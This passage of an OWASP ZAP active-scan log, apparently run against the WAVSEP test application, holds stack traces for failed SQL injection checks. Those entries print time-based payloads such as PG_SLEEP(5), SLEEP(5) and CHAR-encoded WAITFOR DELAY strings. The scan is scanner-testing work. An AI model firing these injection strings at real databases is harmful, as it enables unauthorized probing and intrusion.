org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680694 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680695 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))UzdQ)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';(SELECT * FROM (SELECT(SLEEP(5)))UzdQ)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680695 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680696 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nSGL)#] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;(SELECT * FROM (SELECT(SLEEP(5)))nSGL)# at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680697 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini%';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini%';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680698 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680698 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680699 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini);WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680699 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680700 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini;WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680701 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680701 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini');SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680703 [ZAP-ActiveScanner-0] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';SELECT PG_SLEEP(5)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.sendPayload(SQLInjectionPlugin.java:1135) at org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin.scan(SQLInjectionPlugin.java:926) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 17 more 9680703 [ZAP-ActiveScanner-1] WARN org.zaproxy.zap.extension.sqliplugin.SQLInjectionPlugin - SQL Injection vulnerability check failed for parameter [target] and payload [content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)--] due to an I/O error org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/content.ini';WAITFOR DELAY CHAR(48)+CHAR(58)+CHAR(48)+CHAR(58)+CHAR(91)+CHAR(83)+CHAR(76)+CHAR(69)+CHAR(69)+CHAR(80)+CHAR(84)+CHAR(73)+CHAR(77)+CHAR(69)+CHAR(93)-- at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at 